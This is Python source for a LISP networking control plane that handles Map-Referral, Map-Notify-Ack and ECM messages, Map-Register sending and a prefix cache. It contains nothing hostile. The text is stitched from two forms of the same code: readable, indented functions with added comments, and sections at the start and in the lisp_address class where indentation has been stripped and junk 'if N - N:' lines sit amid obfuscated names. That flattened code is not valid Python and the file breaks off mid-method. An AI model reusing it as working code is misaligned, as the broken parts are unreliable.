if 43 - 43: OoOoOO00 % OOooOOo / I1IiiI + I1IiiI
if 40 - 40: OOooOOo . I1Ii111 + I1Ii111
if 4 - 4: iIii1I11I1II1 - iIii1I11I1II1 * I11i
if 32 - 32: I1IiiI + II111iiii * iII111i + O0 / O0 * Oo0Ooo
if 64 - 64: i11iIiiIii / iII111i + i11iIiiIii . I11i
if 66 - 66: i1IIi
if 98 - 98: Oo0Ooo / iIii1I11I1II1
if 33 - 33: O0 - iII111i
def lisp_process_map_notify_ack(packet, source):
    map_notify = lisp_map_notify("")
    packet = map_notify.decode(packet)
    if (packet == None):
        lprint("Could not decode Map-Notify-Ack packet")
        return

    map_notify.print_notify()

    #
    # Get the EID-record so we can find the site to authenticate against.
    #
    if (map_notify.record_count < 1):
        lprint("No EID-prefix found, cannot authenticate Map-Notify-Ack")
        return

    eid_record = lisp_eid_record()

    if (eid_record.decode(map_notify.eid_records) == None):
        lprint("Could not decode EID-record, cannot authenticate " +
            "Map-Notify-Ack")
        return
    eid_record.print_record("  ", False)

    eid_str = eid_record.print_eid_tuple()

    #
    # Authenticate with the site's configured key for the given key-id.
    #
    if (map_notify.alg_id != LISP_NONE_ALG_ID and map_notify.auth_len != 0):
        site_eid = lisp_sites_by_eid.lookup_cache(eid_record.eid, True)
        if (site_eid == None):
            not_found = bold("Site not found", False)
            lprint(("{} for EID {}, cannot authenticate Map-Notify-Ack").
                format(not_found, green(eid_str, False)))
            return
        site = site_eid.site

        site.map_notify_acks_received += 1

        key_id = map_notify.key_id
        if (key_id in site.auth_key):
            password = site.auth_key[key_id]
        else:
            password = ""

        auth_good = lisp_verify_auth(packet, map_notify.alg_id,
            map_notify.auth_data, password)

        key_id_str = "key-id {}".format(key_id) if key_id == \
            map_notify.key_id else "bad key-id {}".format(map_notify.key_id)

        lprint("  Authentication {} for Map-Notify-Ack, {}".format(
            "succeeded" if auth_good else "failed", key_id_str))
        if (auth_good == False): return

    #
    # Cancel retransmission and dequeue the pending Map-Notify.
    #
    if (map_notify.retransmit_timer): map_notify.retransmit_timer.cancel()

    source_str = source.print_address()
    key = map_notify.nonce_key

    if (key in lisp_map_notify_queue):
        map_notify = lisp_map_notify_queue.pop(key)
        if (map_notify.retransmit_timer):
            map_notify.retransmit_timer.cancel()
        lprint("Dequeue Map-Notify from retransmit queue, key is: {}".format(
            key))
    else:
        lprint("Map-Notify with nonce 0x{} queue entry not found for {}".
            format(map_notify.nonce_key, red(source_str, False)))
    return

def lisp_map_referral_loop(mr, eid, group, action, s):
    if (action not in (LISP_DDT_ACTION_NODE_REFERRAL,
        LISP_DDT_ACTION_MS_REFERRAL)): return(False)

    if (mr.last_cached_prefix[0] == None): return(False)

    #
    # A referral loops when the referred prefix is not more-specific than
    # the prefix cached from the previous referral.
    #
    loop = False
    if (group.is_null() == False):
        loop = mr.last_cached_prefix[1].is_more_specific(group)
    if (loop == False):
        loop = mr.last_cached_prefix[0].is_more_specific(eid)

    if (loop):
        eid_str = lisp_print_eid_tuple(eid, group)
        cached_str = lisp_print_eid_tuple(mr.last_cached_prefix[0],
            mr.last_cached_prefix[1])

        lprint(("Map-Referral prefix {} from {} is not more-specific " +
            "than cached prefix {}").format(green(eid_str, False), s,
            cached_str))
    return(loop)

def lisp_process_map_referral(lisp_sockets, packet, source):

    map_referral = lisp_map_referral()
    packet = map_referral.decode(packet)
    if (packet == None):
        lprint("Could not decode Map-Referral packet")
        return
    map_referral.print_map_referral()

    source_str = source.print_address()
    nonce = map_referral.nonce

    #
    # Process each EID-record in the Map-Referral.
    #
    for i in range(map_referral.record_count):
        eid_record = lisp_eid_record()
        packet = eid_record.decode(packet)
        if (packet == None):
            lprint("Could not decode EID-record in Map-Referral packet")
            return
        eid_record.print_record("  ", True)

        #
        # Match the nonce against an outstanding DDT Map-Request.
        #
        key = str(nonce)
        if (key not in lisp_ddt_map_requestQ):
            lprint(("Map-Referral nonce 0x{} from {} not found in " +
                "Map-Request queue, EID-record ignored").format(
                lisp_hex_string(nonce), source_str))
            continue

        mr = lisp_ddt_map_requestQ[key]
        if (mr == None):
            lprint(("No Map-Request queue entry found for Map-Referral " +
                "nonce 0x{} from {}, EID-record ignored").format(
                lisp_hex_string(nonce), source_str))
            continue

        #
        # Check for referral loops before caching the referred prefix.
        #
        if (lisp_map_referral_loop(mr, eid_record.eid, eid_record.group,
            eid_record.action, source_str)):
            mr.dequeue_map_request()
            continue

        mr.last_cached_prefix[0] = eid_record.eid
        mr.last_cached_prefix[1] = eid_record.group

        #
        # Find or create the referral-cache entry.
        #
        new_referral = False
        referral = lisp_referral_cache_lookup(eid_record.eid,
            eid_record.group, True)
        if (referral == None):
            new_referral = True
            referral = lisp_referral()
            referral.eid = eid_record.eid
            referral.group = eid_record.group
            if (eid_record.ddt_incomplete == False): referral.add_cache()
        elif (referral.referral_source.not_set()):
            lprint("Do not replace static referral entry {}".format(
                green(referral.print_eid_tuple(), False)))
            mr.dequeue_map_request()
            continue

        action = eid_record.action
        referral.referral_source = source
        referral.referral_type = action
        ttl = eid_record.store_ttl()
        referral.referral_ttl = ttl
        referral.expires = lisp_set_timestamp(ttl)

        #
        # Track up/down state of the referral-node we heard from.
        #
        negative = referral.is_referral_negative()
        if (source_str in referral.referral_set):
            referral_node = referral.referral_set[source_str]

            if (referral_node.updown == False and negative == False):
                referral_node.updown = True
                lprint("Change up/down status for referral-node {} to up".
                    format(source_str))
            elif (referral_node.updown == True and negative == True):
                referral_node.updown = False
                lprint(("Change up/down status for referral-node {} " +
                    "to down, received negative referral").format(source_str))

        #
        # Remember the existing referral-nodes so stale ones can be removed
        # after the RLOC-records are processed.
        #
        delete_set = {}
        for key in referral.referral_set: delete_set[key] = None

        #
        # Process each RLOC-record, adding new referral-nodes and
        # refreshing existing ones.
        #
        for j in range(eid_record.rloc_count):
            rloc_record = lisp_rloc_record()
            packet = rloc_record.decode(packet, None)
            if (packet == None):
                lprint("Could not decode RLOC-record in Map-Referral packet")
                return
            rloc_record.print_record("    ")

            addr_str = rloc_record.rloc.print_address()
            if (addr_str not in referral.referral_set):
                referral_node = lisp_referral_node()
                referral_node.referral_address.copy_address(rloc_record.rloc)
                referral.referral_set[addr_str] = referral_node
                if (source_str == addr_str and negative):
                    referral_node.updown = False
            else:
                referral_node = referral.referral_set[addr_str]
                if (addr_str in delete_set): delete_set.pop(addr_str)

            referral_node.priority = rloc_record.priority
            referral_node.weight = rloc_record.weight

        #
        # Remove referral-nodes that were not in this Map-Referral.
        #
        for key in delete_set: referral.referral_set.pop(key)

        eid_str = referral.print_eid_tuple()

        if (new_referral):
            if (eid_record.ddt_incomplete):
                lprint("Suppress add {} to referral-cache".format(
                    green(eid_str, False)))
            else:
                lprint("Add {}, referral-count {} to referral-cache".format(
                    green(eid_str, False), eid_record.rloc_count))
        else:
            lprint("Replace {}, referral-count: {} in referral-cache".
                format(green(eid_str, False), eid_record.rloc_count))

        #
        # Act on the referral action code.
        #
        if (action == LISP_DDT_ACTION_DELEGATION_HOLE):
            lisp_send_negative_map_reply(mr.lisp_sockets, referral.eid,
                referral.group, mr.nonce, mr.itr, mr.sport, 15, None, False)
            mr.dequeue_map_request()

        if (action == LISP_DDT_ACTION_NOT_AUTH):
            if (mr.tried_root):
                lisp_send_negative_map_reply(mr.lisp_sockets, referral.eid,
                    referral.group, mr.nonce, mr.itr, mr.sport, 0, None,
                    False)
                mr.dequeue_map_request()
            else:
                lisp_send_ddt_map_request(mr, True)

        if (action == LISP_DDT_ACTION_MS_NOT_REG):
            if (source_str in referral.referral_set):
                referral_node = referral.referral_set[source_str]
                referral_node.updown = False
            if (len(referral.referral_set) == 0):
                mr.dequeue_map_request()
            else:
                lisp_send_ddt_map_request(mr, False)

        if (action in (LISP_DDT_ACTION_NODE_REFERRAL,
            LISP_DDT_ACTION_MS_REFERRAL)):
            if (mr.eid.is_exact_match(eid_record.eid)):
                if (not mr.tried_root):
                    lisp_send_ddt_map_request(mr, True)
                else:
                    lisp_send_negative_map_reply(mr.lisp_sockets,
                        referral.eid, referral.group, mr.nonce, mr.itr,
                        mr.sport, 15, None, False)
                    mr.dequeue_map_request()
            else:
                lisp_send_ddt_map_request(mr, False)

        if (action == LISP_DDT_ACTION_MS_ACK): mr.dequeue_map_request()
    return

def lisp_process_ecm(lisp_sockets, packet, source, ecm_port):
    ecm = lisp_ecm(0)
    packet = ecm.decode(packet)
    if (packet == None):
        lprint("Could not decode ECM packet")
        return

    ecm.print_ecm()

    header = lisp_control_header()
    if (header.decode(packet) == None):
        lprint("Could not decode control header")
        return

    packet_type = header.type
    del(header)

    if (packet_type != LISP_MAP_REQUEST):
        lprint("Received ECM without Map-Request inside")
        return

    #
    # Process the inner Map-Request, passing the inner UDP source port so
    # the Map-Reply can be returned to the right port.
    #
    sport = ecm.udp_sport
    timestamp = time.time()
    lisp_process_map_request(lisp_sockets, packet, source, ecm_port,
        ecm.source, sport, ecm.ddt, -1, timestamp)
    return

def lisp_send_map_register(lisp_sockets, packet, map_register, ms):

    #
    # For a LISP-Decent push configuration, the first Map-Register to a
    # multicast group is looped back to 127.0.0.1 so this xTR bootstraps
    # its own mapping system.
    #
    dest = ms.map_server
    if (lisp_decent_push_configured and dest.is_multicast_address() and
        (ms.map_registers_multicast_sent == 1 or
        ms.map_registers_sent == 1)):
        dest = copy.deepcopy(dest)
        dest.address = 0x7f000001
        bootstrap = bold("Bootstrap", False)
        group = ms.map_server.print_address_no_iid()
        lprint("{} mapping system for peer-group {}".format(bootstrap,
            group))

    #
    # Compute authentication over the Map-Register.
    #
    packet = lisp_compute_auth(packet, map_register, ms.password)

    #
    # Optionally encrypt everything after the first 4 bytes with ChaCha20.
    #
    if (ms.ekey != None):
        key = ms.ekey.zfill(32)
        iv = "0" * 8
        ciphertext = chacha.ChaCha(key, iv, 20).encrypt(packet[4::])
        packet = packet[0:4] + ciphertext
        encrypt = bold("Encrypt", False)
        lprint("{} Map-Register with key-id {}".format(encrypt, ms.ekey_id))

    decent = ""
    if (lisp_decent_pull_xtr_configured()):
        decent = ", decent-index {}".format(bold(ms.dns_name, False))

    lprint("Send Map-Register to map-server {}{}{}".format(
        dest.print_address(), ", ms-name '{}'".format(ms.ms_name), decent))

    lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
    return

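#
# Note on the ChaCha20 usage in lisp_send_map_register() above: ChaCha20 is
# a stream cipher, so the same keystream operation both encrypts and
# decrypts. A hedged sketch of the receiver side (assuming the same chacha
# module and a shared ms.ekey) would be:
#
#   plaintext = chacha.ChaCha(key, iv, 20).encrypt(packet[4::])
#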
def lisp_send_ipc_to_core(lisp_socket, packet, dest, port):
    source = lisp_socket.getsockname()
    dest = dest.print_address_no_iid()

    lprint("Send IPC {} bytes to {} {}, control-packet: {}".format(
        len(packet), dest, port, lisp_format_packet(packet)))

    packet = lisp_control_packet_ipc(packet, source, dest, port)
    lisp_ipc(packet, lisp_socket, "lisp-core-pkt")
    return

def lisp_send_map_reply(lisp_sockets, packet, dest, port):
    lprint("Send Map-Reply to {}".format(dest.print_address_no_iid()))
    lisp_send_ipc_to_core(lisp_sockets[2], packet, dest, port)
    return

def lisp_send_map_referral(lisp_sockets, packet, dest, port):
    lprint("Send Map-Referral to {}".format(dest.print_address()))
    lisp_send_ipc_to_core(lisp_sockets[2], packet, dest, port)
    return

def lisp_send_map_notify(lisp_sockets, packet, dest, port):
    lprint("Send Map-Notify to xTR {}".format(dest.print_address()))
    lisp_send_ipc_to_core(lisp_sockets[2], packet, dest, port)
    return

def lisp_send_ecm(lisp_sockets, packet, inner_source, inner_sport,
    inner_dest, outer_dest, to_etr=False, to_ms=False, ddt=False):

    if (inner_source == None or inner_source.is_null()):
        inner_source = inner_dest

    #
    # When NAT-traversal is configured, use the translated port as the
    # inner UDP source port so replies come back through the NAT.
    #
    if (lisp_nat_traversal):
        port = lisp_get_any_translated_port()
        if (port != None): inner_sport = port

    ecm = lisp_ecm(inner_sport)

    ecm.to_etr = to_etr if lisp_is_running("lisp-etr") else False
    ecm.to_ms = to_ms if lisp_is_running("lisp-ms") else False
    ecm.ddt = ddt
    ecm_packet = ecm.encode(packet, inner_source, inner_dest)
    if (ecm_packet == None):
        lprint("Could not encode ECM message")
        return
    ecm.print_ecm()

    packet = ecm_packet + packet

    addr_str = outer_dest.print_address_no_iid()
    lprint("Send Encapsulated-Control-Message to {}".format(addr_str))
    dest = lisp_convert_4to6(addr_str)
    lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
    return

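#
# Hedged usage sketch for lisp_send_ecm() (the argument names below are
# hypothetical, not taken from the surrounding code): an ITR forwarding a
# Map-Request to a Map-Resolver would call roughly:
#
#   lisp_send_ecm(lisp_sockets, map_request_packet, itr_eid, sport,
#       target_eid, map_resolver_rloc)
#
# The ECM header records (itr_eid, target_eid, sport) and the result is
# sent to map_resolver_rloc on LISP_CTRL_PORT.
#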
#
# Address-family constants. Negative values are internal pseudo-AFIs.
#
LISP_AFI_GEO_COORD = -3
LISP_AFI_IID_RANGE = -2
LISP_AFI_ULTIMATE_ROOT = -1
LISP_AFI_NONE = 0
LISP_AFI_IPV4 = 1
LISP_AFI_IPV6 = 2
LISP_AFI_MAC = 6
LISP_AFI_E164 = 8
LISP_AFI_NAME = 17
LISP_AFI_LCAF = 16387

#
# RLOC state values.
#
LISP_RLOC_UNKNOWN_STATE = 0
LISP_RLOC_UP_STATE = 1
LISP_RLOC_DOWN_STATE = 2
LISP_RLOC_UNREACH_STATE = 3
LISP_RLOC_NO_ECHOED_NONCE_STATE = 4
LISP_RLOC_ADMIN_DOWN_STATE = 5

#
# Authentication algorithm IDs.
#
LISP_AUTH_NONE = 0
LISP_AUTH_MD5 = 1
LISP_AUTH_SHA1 = 2
LISP_AUTH_SHA2 = 3

#
# Host mask lengths per address-family.
#
LISP_IPV4_HOST_MASK_LEN = 32
LISP_IPV6_HOST_MASK_LEN = 128
LISP_MAC_HOST_MASK_LEN = 48
LISP_E164_HOST_MASK_LEN = 60

def byte_swap_64(address):
    addr = ((address & 0x00000000000000ff) << 56) | \
           ((address & 0x000000000000ff00) << 40) | \
           ((address & 0x0000000000ff0000) << 24) | \
           ((address & 0x00000000ff000000) << 8)  | \
           ((address & 0x000000ff00000000) >> 8)  | \
           ((address & 0x0000ff0000000000) >> 24) | \
           ((address & 0x00ff000000000000) >> 40) | \
           ((address & 0xff00000000000000) >> 56)
    return(addr)

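#
# Worked example (illustrative): byte_swap_64() reverses the byte order of
# a 64-bit value, so:
#
#   >>> hex(byte_swap_64(0x0102030405060708))
#   '0x807060504030201'
#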
class lisp_cache_entries(object):
    def __init__(self):
        self.entries = {}
        self.entries_sorted = []

class lisp_cache(object):
    def __init__(self):
        self.cache = {}
        self.cache_sorted = []
        self.cache_count = 0

    def cache_size(self):
        return(self.cache_count)

    def build_key(self, prefix):

        #
        # The first-level key is a mask-length, offset so the pseudo-AFIs
        # sort before real address-families.
        #
        if (prefix.afi == LISP_AFI_ULTIMATE_ROOT):
            ml = 0
        elif (prefix.afi == LISP_AFI_IID_RANGE):
            ml = prefix.mask_len
        else:
            ml = prefix.mask_len + 48

        iid = lisp_hex_string(prefix.instance_id).zfill(8)
        afi = lisp_hex_string(prefix.afi).zfill(4)

        if (prefix.afi > 0):
            if (prefix.is_binary()):
                length = prefix.addr_length() * 2
                addr = lisp_hex_string(prefix.address).zfill(length)
            else:
                addr = prefix.address
        elif (prefix.afi == LISP_AFI_GEO_COORD):
            afi = "8003"
            addr = prefix.address.print_geo()
        else:
            afi = ""
            addr = ""

        key = iid + afi + addr
        return([ml, key])

    def add_cache(self, prefix, entry):
        if (prefix.is_binary()): prefix.zero_host_bits()
        ml, key = self.build_key(prefix)
        if (ml not in self.cache):
            self.cache[ml] = lisp_cache_entries()
            self.cache_sorted = self.sort_in_entry(self.cache_sorted, ml)
        if (key not in self.cache[ml].entries):
            self.cache_count += 1
        self.cache[ml].entries[key] = entry

    def lookup_cache(self, prefix, exact):
        ml, key = self.build_key(prefix)
        if (exact):
            if (ml not in self.cache): return(None)
            if (key not in self.cache[ml].entries): return(None)
            return(self.cache[ml].entries[key])

        #
        # Longest-match: walk mask-lengths in sorted order and remember
        # the most-specific covering entry found so far.
        #
        found = None
        for entry_ml in self.cache_sorted:
            if (ml < entry_ml): return(found)
            for entry in list(self.cache[entry_ml].entries.values()):
                if (prefix.is_more_specific(entry.eid)):
                    if (found == None or
                        entry.eid.is_more_specific(found.eid)):
                        found = entry
        return(found)

    def delete_cache(self, prefix):
        ml, key = self.build_key(prefix)
        if (ml not in self.cache): return
        if (key not in self.cache[ml].entries): return
        self.cache[ml].entries.pop(key)
        self.cache_count -= 1

    def walk_cache(self, function, parms):
        for ml in self.cache_sorted:
            for entry in list(self.cache[ml].entries.values()):
                status, parms = function(entry, parms)
                if (status == False): return(parms)
        return(parms)

    def sort_in_entry(self, table, value):

        #
        # Binary-search insertion that keeps self.cache_sorted ordered.
        #
        if (table == []): return([value])

        t = table
        while (True):
            if (len(t) == 1):
                if (value == t[0]): return(table)
                index = table.index(t[0])
                if (value < t[0]):
                    return(table[0:index] + [value] + table[index::])
                if (value > t[0]):
                    return(table[0:index+1] + [value] + table[index+1::])
            index = old_div(len(t), 2)
            t = t[0:index] if (value < t[index]) else t[index::]

        return([])

    def print_cache(self):
        lprint("Printing contents of {}: ".format(self))
        if (self.cache_size() == 0):
            lprint("  Cache is empty")
            return
        for ml in self.cache_sorted:
            for key in self.cache[ml].entries:
                entry = self.cache[ml].entries[key]
                lprint("  Mask-length: {}, key: {}, entry: {}".format(ml,
                    key, entry))

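#
# Usage sketch for lisp_cache (hypothetical values, not executed here).
# Entries are keyed by (mask-length, instance-id + AFI + address), so a
# longest-match lookup works like:
#
#   cache = lisp_cache()
#   prefix = lisp_address(LISP_AFI_IPV4, "10.0.0.0", 8, 0)
#   cache.add_cache(prefix, entry)            # entry must expose .eid
#   host = lisp_address(LISP_AFI_IPV4, "10.1.1.1", 32, 0)
#   best = cache.lookup_cache(host, False)    # longest match -> entry
#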
#
# Global caches used by the control-plane.
#
lisp_referral_cache = lisp_cache()
lisp_ddt_cache = lisp_cache()
lisp_sites_by_eid = lisp_cache()
lisp_map_cache = lisp_cache()
lisp_db_for_lookups = lisp_cache()

def lisp_map_cache_lookup(source, dest):

    multicast = dest.is_multicast_address()

    #
    # First-stage lookup on the destination.
    #
    mc = lisp_map_cache.lookup_cache(dest, False)
    if (mc == None):
        eid_str = source.print_sg(dest) if multicast else \
            dest.print_address()
        eid_str = green(eid_str, False)
        dprint("Lookup for EID {} not found in map-cache".format(eid_str))
        return(None)

    #
    # For a unicast destination, the first-stage lookup is the answer.
    #
    if (multicast == False):
        m_str = green(mc.eid.print_prefix(), False)
        dprint("Lookup for EID {} found map-cache entry {}".format(
            green(dest.print_address(), False), m_str))
        return(mc)

    #
    # For a multicast destination, do a second-stage lookup on the source
    # to find the (S,G) entry.
    #
    mc = mc.lookup_source_cache(source, False)
    if (mc == None):
        eid_str = source.print_sg(dest)
        dprint("Lookup for EID {} not found in map-cache".format(eid_str))
        return(None)

    m_str = green(mc.print_eid_tuple(), False)
    dprint("Lookup for EID {} found map-cache entry {}".format(
        green(source.print_sg(dest), False), m_str))
    return(mc)

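#
# Illustrative note (addresses are hypothetical): for a multicast packet
# from source 10.1.1.1 to group 224.1.1.1, lisp_map_cache_lookup() does a
# two-stage lookup, roughly:
#
#   g_entry = lisp_map_cache.lookup_cache(group, False)     # on 224.1.1.1
#   sg_entry = g_entry.lookup_source_cache(source, False)   # on 10.1.1.1
#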
def lisp_referral_cache_lookup(eid, group, exact):
    if (group and group.is_null()):
        referral = lisp_referral_cache.lookup_cache(eid, exact)
        return(referral)

    #
    # (S,G) lookup: match the group first, then the source within the
    # group entry, mirroring the map-cache two-stage lookup.
    #
    if (eid == None or eid.is_null()): return(None)

    referral = lisp_referral_cache.lookup_cache(group, exact)
    if (referral == None): return(None)

    source_referral = referral.lookup_source_cache(eid, exact)
    if (source_referral): return(source_referral)

    if (exact): referral = None
    return(referral)

def lisp_ddt_cache_lookup(eid, group, exact):
    if (group.is_null()):
        ddt_entry = lisp_ddt_cache.lookup_cache(eid, exact)
        return(ddt_entry)

    #
    # (S,G) lookup: group first, then source within the group entry.
    #
    if (eid.is_null()): return(None)

    ddt_entry = lisp_ddt_cache.lookup_cache(group, exact)
    if (ddt_entry == None): return(None)

    source_ddt = ddt_entry.lookup_source_cache(eid, exact)
    if (source_ddt): return(source_ddt)

    if (exact): ddt_entry = None
    return(ddt_entry)

def lisp_site_eid_lookup(eid, group, exact):

    if (group.is_null()):
        site_eid = lisp_sites_by_eid.lookup_cache(eid, exact)
        return(site_eid)

    #
    # (S,G) lookup: group first, then source within the group entry.
    #
    if (eid.is_null()): return(None)

    site_eid = lisp_sites_by_eid.lookup_cache(group, exact)
    if (site_eid == None): return(None)

    #
    # If the source is found under the group entry, return it. Otherwise,
    # for longest-match lookups, fall back to a parent entry that accepts
    # more-specifics.
    #
    source_site_eid = site_eid.lookup_source_cache(eid, exact)
    if (source_site_eid): return(source_site_eid)

    if (exact):
        site_eid = None
    else:
        parent = site_eid.parent_for_more_specifics
        if (parent and parent.accept_more_specifics):
            if (group.is_more_specific(parent.group)): site_eid = parent
    return(site_eid)

class lisp_address ( object ) :
def __init__ ( self , afi , addr_str , mask_len , iid ) :
self . afi = afi
self . mask_len = mask_len
self . instance_id = iid
self . iid_list = [ ]
self . address = 0
if ( addr_str != "" ) : self . store_address ( addr_str )
if 83 - 83: OOooOOo * I1ii11iIi11i * iII111i * I1ii11iIi11i . OoO0O00
if 87 - 87: ooOoO0o . O0 - oO0o
def copy_address ( self , addr ) :
if ( addr == None ) : return
self . afi = addr . afi
self . address = addr . address
self . mask_len = addr . mask_len
self . instance_id = addr . instance_id
self . iid_list = addr . iid_list
if 75 - 75: Oo0Ooo
if 22 - 22: oO0o * I1Ii111 . II111iiii / Ii1I * O0
def make_default_route ( self , addr ) :
self . afi = addr . afi
self . instance_id = addr . instance_id
self . mask_len = 0
self . address = 0
if 33 - 33: oO0o * i1IIi + ooOoO0o * OOooOOo - O0 - iIii1I11I1II1
if 35 - 35: I1Ii111
def make_default_multicast_route ( self , addr ) :
self . afi = addr . afi
self . instance_id = addr . instance_id
if ( self . afi == LISP_AFI_IPV4 ) :
self . address = 0xe0000000
self . mask_len = 4
if 12 - 12: Ii1I % I1IiiI - I11i / iIii1I11I1II1 . I1IiiI % I1ii11iIi11i
if ( self . afi == LISP_AFI_IPV6 ) :
self . address = 0xff << 120
self . mask_len = 8
if 12 - 12: Oo0Ooo + I1IiiI
if ( self . afi == LISP_AFI_MAC ) :
self . address = 0xffffffffffff
self . mask_len = 48
if 12 - 12: OoOoOO00 / II111iiii
if 100 - 100: I1ii11iIi11i % iIii1I11I1II1 . IiII . OoooooooOO / II111iiii
if 28 - 28: I1IiiI
def not_set ( self ) :
return ( self . afi == LISP_AFI_NONE )
if 27 - 27: I1IiiI % oO0o - iIii1I11I1II1 - o0oOOo0O0Ooo - IiII - O0
if 46 - 46: II111iiii
def is_private_address ( self ) :
if ( self . is_ipv4 ( ) == False ) : return ( False )
oOOOo0o = self . address
if ( ( ( oOOOo0o & 0xff000000 ) >> 24 ) == 10 ) : return ( True )
if ( ( ( oOOOo0o & 0xff000000 ) >> 24 ) == 172 ) :
IiIiI1IIi1Ii = ( oOOOo0o & 0x00ff0000 ) >> 16
if ( IiIiI1IIi1Ii >= 16 and IiIiI1IIi1Ii <= 31 ) : return ( True )
if 5 - 5: i11iIiiIii . OoO0O00 - oO0o - OoooooooOO % IiII * O0
if ( ( ( oOOOo0o & 0xffff0000 ) >> 16 ) == 0xc0a8 ) : return ( True )
return ( False )
if 48 - 48: Ii1I / Ii1I / i1IIi * I1IiiI . iII111i + I1ii11iIi11i
if 66 - 66: iIii1I11I1II1 . iIii1I11I1II1 + I1ii11iIi11i
def is_multicast_address ( self ) :
if ( self . is_ipv4 ( ) ) : return ( self . is_ipv4_multicast ( ) )
if ( self . is_ipv6 ( ) ) : return ( self . is_ipv6_multicast ( ) )
if ( self . is_mac ( ) ) : return ( self . is_mac_multicast ( ) )
return ( False )
if 45 - 45: iII111i . oO0o * iII111i
if 3 - 3: OoOoOO00 / Oo0Ooo - Oo0Ooo
def host_mask_len ( self ) :
if ( self . afi == LISP_AFI_IPV4 ) : return ( LISP_IPV4_HOST_MASK_LEN )
if ( self . afi == LISP_AFI_IPV6 ) : return ( LISP_IPV6_HOST_MASK_LEN )
if ( self . afi == LISP_AFI_MAC ) : return ( LISP_MAC_HOST_MASK_LEN )
if ( self . afi == LISP_AFI_E164 ) : return ( LISP_E164_HOST_MASK_LEN )
if ( self . afi == LISP_AFI_NAME ) : return ( len ( self . address ) * 8 )
if ( self . afi == LISP_AFI_GEO_COORD ) :
return ( len ( self . address . print_geo ( ) ) * 8 )
if 54 - 54: Oo0Ooo . OoO0O00 * I1IiiI % IiII
return ( 0 )
if 97 - 97: o0oOOo0O0Ooo + Ii1I
if 77 - 77: I11i - oO0o . Ii1I
def is_iana_eid ( self ) :
if ( self . is_ipv6 ( ) == False ) : return ( False )
oOOOo0o = self . address >> 96
return ( oOOOo0o == 0x20010005 )
if 75 - 75: I11i * OoooooooOO % OoOoOO00 . i1IIi - Ii1I + iIii1I11I1II1
if 74 - 74: ooOoO0o
def addr_length ( self ) :
if ( self . afi == LISP_AFI_IPV4 ) : return ( 4 )
if ( self . afi == LISP_AFI_IPV6 ) : return ( 16 )
if ( self . afi == LISP_AFI_MAC ) : return ( 6 )
if ( self . afi == LISP_AFI_E164 ) : return ( 8 )
if ( self . afi == LISP_AFI_LCAF ) : return ( 0 )
if ( self . afi == LISP_AFI_NAME ) : return ( len ( self . address ) + 1 )
if ( self . afi == LISP_AFI_IID_RANGE ) : return ( 4 )
if ( self . afi == LISP_AFI_GEO_COORD ) :
return ( len ( self . address . print_geo ( ) ) )
if 18 - 18: iIii1I11I1II1 - I11i - oO0o
return ( 0 )
if 12 - 12: O0 + O0 + ooOoO0o . I1IiiI * II111iiii
if 47 - 47: i11iIiiIii % OOooOOo / ooOoO0o . IiII - I1IiiI
def afi_to_version ( self ) :
if ( self . afi == LISP_AFI_IPV4 ) : return ( 4 )
if ( self . afi == LISP_AFI_IPV6 ) : return ( 6 )
return ( 0 )
if 10 - 10: Oo0Ooo / ooOoO0o / I1ii11iIi11i
if 98 - 98: O0 - I1Ii111 - i11iIiiIii
def packet_format ( self ) :
if 85 - 85: II111iiii - I1ii11iIi11i % I1IiiI . I1IiiI - OoooooooOO - I11i
if 38 - 38: i1IIi + oO0o * ooOoO0o % Ii1I % ooOoO0o
if 80 - 80: OoO0O00 + OoOoOO00 % iII111i % OoooooooOO - ooOoO0o
if 25 - 25: OoOoOO00 % i11iIiiIii - I1IiiI * iIii1I11I1II1 - Oo0Ooo . O0
if 48 - 48: I1IiiI + oO0o % i11iIiiIii % iIii1I11I1II1
if ( self . afi == LISP_AFI_IPV4 ) : return ( "I" )
if ( self . afi == LISP_AFI_IPV6 ) : return ( "QQ" )
if ( self . afi == LISP_AFI_MAC ) : return ( "HHH" )
if ( self . afi == LISP_AFI_E164 ) : return ( "II" )
if ( self . afi == LISP_AFI_LCAF ) : return ( "I" )
return ( "" )
if 14 - 14: iIii1I11I1II1
if 78 - 78: I1Ii111 / Oo0Ooo - I1Ii111
def pack_address ( self ) :
Iii1iIII1Iii = self . packet_format ( )
OO0Oo00OO0oo = b""
if ( self . is_ipv4 ( ) ) :
OO0Oo00OO0oo = struct . pack ( Iii1iIII1Iii , socket . htonl ( self . address ) )
elif ( self . is_ipv6 ( ) ) :
III = byte_swap_64 ( self . address >> 64 )
I1I = byte_swap_64 ( self . address & 0xffffffffffffffff )
OO0Oo00OO0oo = struct . pack ( Iii1iIII1Iii , III , I1I )
elif ( self . is_mac ( ) ) :
oOOOo0o = self . address
III = ( oOOOo0o >> 32 ) & 0xffff
I1I = ( oOOOo0o >> 16 ) & 0xffff
iI1II1i1I = oOOOo0o & 0xffff
OO0Oo00OO0oo = struct . pack ( Iii1iIII1Iii , III , I1I , iI1II1i1I )
elif ( self . is_e164 ( ) ) :
oOOOo0o = self . address
III = ( oOOOo0o >> 32 ) & 0xffffffff
I1I = ( oOOOo0o & 0xffffffff )
OO0Oo00OO0oo = struct . pack ( Iii1iIII1Iii , III , I1I )
elif ( self . is_dist_name ( ) ) :
OO0Oo00OO0oo += ( self . address + "\0" ) . encode ( )
if 19 - 19: iIii1I11I1II1 / iII111i + OOooOOo . ooOoO0o
return ( OO0Oo00OO0oo )
if 85 - 85: i1IIi
if 78 - 78: oO0o
def unpack_address ( self , packet ) :
Iii1iIII1Iii = self . packet_format ( )
oOoOo000Ooooo = struct . calcsize ( Iii1iIII1Iii )
if ( len ( packet ) < oOoOo000Ooooo ) : return ( None )
if 6 - 6: IiII
oOOOo0o = struct . unpack ( Iii1iIII1Iii , packet [ : oOoOo000Ooooo ] )
if 69 - 69: iII111i
if ( self . is_ipv4 ( ) ) :
self . address = socket . ntohl ( oOOOo0o [ 0 ] )
if 87 - 87: i11iIiiIii % o0oOOo0O0Ooo + Ii1I
elif ( self . is_ipv6 ( ) ) :
if 72 - 72: Ii1I / II111iiii + o0oOOo0O0Ooo
if 33 - 33: I1Ii111 * OoOoOO00 - OoooooooOO
if 11 - 11: I1Ii111 - Oo0Ooo / iIii1I11I1II1 - OoooooooOO
if 71 - 71: Oo0Ooo + Ii1I - OoooooooOO + I11i - iIii1I11I1II1 / O0
if 76 - 76: i11iIiiIii % o0oOOo0O0Ooo . O0 * I11i
if 90 - 90: II111iiii + OOooOOo % I1Ii111 * iIii1I11I1II1 % iIii1I11I1II1
